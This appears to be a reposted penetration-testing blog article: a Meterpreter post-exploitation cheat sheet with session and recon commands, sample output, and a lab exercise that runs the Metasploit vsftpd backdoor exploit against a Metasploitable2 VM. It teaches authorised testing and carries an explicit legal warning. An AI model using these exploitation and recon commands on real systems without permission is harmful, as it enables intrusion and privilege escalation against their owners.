π° Originally published on SecurityElites β the canonical, fully-updated version of this article.
How experienced are you with Meterpreter post-exploitation?
Just started learning Metasploit Can get a shell but struggle with post-exploitation Comfortable with core commands, learning advanced techniques Use Meterpreter regularly in authorised engagements
β οΈ Authorised Systems Only. Every Meterpreter command in this guide must only be used on systems you own or have explicit written authorisation to test. Using these techniques against systems without permission is a criminal offence under computer misuse legislation worldwide. This is a reference guide for authorised penetration testers and students using their own lab environments.
Meterpreter Commands or Cheat Sheet for 2026 :β Youβve landed a shell. Now what? Most guides stop at getting Meterpreter to connect back. The real work β the part that determines whether a penetration test produces actionable findings β is what happens after. System recon that maps the complete environment, credential harvesting that demonstrates actual account compromise, network pivoting that shows the internal attack paths, and persistence that proves an attacker could maintain access. This Meterpreter cheat sheet covers every command you need for the complete Meterpreter post-exploitation workflow with real examples for every stage.
π― What This Meterpreter Cheat Sheet Covers
Core commands β session management, help, shell, background
System recon β sysinfo, getuid, ps, getsystem, hashdump
File operations β upload, download, search, cat, edit
Privilege escalation β getsystem, migrate, local_exploit_suggester
Persistence β run persistence, scheduled tasks, registry run keys
Network pivoting β route, portfwd, socks proxy
β±οΈ Reference guide Β· Bookmark and use on every engagement ### π Meterpreter Commands 2026 β Sections 1. Core and Session Commands 2. System Reconnaissance 3. File Operations 4. Privilege Escalation Commands 5. Credential Harvesting 6. Network Pivoting and Port Forwarding 7. Persistence Mechanisms ## Core and Session Commands These are the commands that control the Meterpreter session itself β backgrounding, interacting with multiple sessions, dropping to a standard shell, and getting help on any command. Every post-exploitation workflow starts here.
CORE METERPRETER COMMANDSCopy
Get help β list all available commands
help
help [command]
Background the current session (returns to msfconsole)
background
bg
List all active sessions
sessions -l
Interact with a specific session
sessions -i 1
Drop to a standard OS shell
shell
Return to Meterpreter from shell: Ctrl+C or βexitβ
Execute a single command and return output
execute -f cmd.exe -a β/c whoamiβ -H -i
Kill the session and remove the payload
exit
exit -y
System Reconnaissance
System recon maps the target environment β OS version, current user privileges, running processes, network configuration, and logged-in users. This information feeds directly into privilege escalation decisions and lateral movement planning. Run these commands first on every new Meterpreter session before anything else.
SYSTEM RECON COMMANDSCopy
System information β OS, hostname, architecture, language
sysinfo
Computer : WIN-SERVER2022
OS : Windows Server 2022 (10.0 Build 20348)
Architecture : x64
Current user context
getuid
Server username: DOMAIN\jsmith
Current process ID and name
getpid
Current pid: 2456
List all running processes
ps
PID PPID Name Arch Session User
4 0 System x64 0 NT AUTHORITY\SYSTEM
768 500 services.exe x64 0 NT AUTHORITY\SYSTEM
2456 1234 chrome.exe x64 1 DOMAIN\jsmith
Network interfaces and routing
ifconfig
ipconfig
arp
route
Environment variables
env
Logged-in users
run post/windows/gather/enum_logged_on_users
Check if weβre in a VM or sandbox
run post/multi/gather/vmware_detection
run post/windows/gather/checkvm
securityelites.com
Meterpreter β First 5 Commands on Every New Session
sysinfo
OS version, hostname, architecture β determines which exploits apply
getuid
Current user context β is it admin/SYSTEM already or not?
ps
Running processes β identify SYSTEM processes for migration targets
ifconfig
Network interfaces β discover internal subnets for pivoting
getpid
Current process β assess stability, plan migration if needed
πΈ The first five Meterpreter commands on every new session. Running these immediately after getting a shell establishes the baseline: what OS, who are we, what privileges, what network access. The answers to these five commands determine every subsequent action β whether to escalate, what processes to target for migration, and which internal networks can be reached for pivoting.
β‘ EXERCISE 1 β KALI TERMINAL (15 MIN)
Open Meterpreter on a Metasploitable VM and Run Full System Recon
β±οΈ 15 minutes Β· Kali + Metasploitable2 lab Β· Your own VMs only
EXERCISE 1 β METERPRETER SYSTEM RECONCopy
Step 1: Get a Meterpreter session on Metasploitable2
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.x.x
set PAYLOAD cmd/unix/interact
run
OR use a different module that gives Meterpreter on your lab target
Step 2: Run the first-5 commands
sysinfo
getuid
getpid
ps
ifconfig
Step 3: Extended recon
arp
netstat
env
Step 4: Note what internal subnets you can see in ifconfig
These are the networks you can pivot into
β What you just learned: The first-5 commands establish the complete post-exploitation baseline in under 60 seconds. The ifconfig output is particularly important β any network interface beyond the one you connected through reveals an internal network the target has access to. Thatβs your pivoting target. The ps list shows which processes are running as SYSTEM β migrating into one of those is the path to privilege escalation without running any exploit.
π Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites β
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)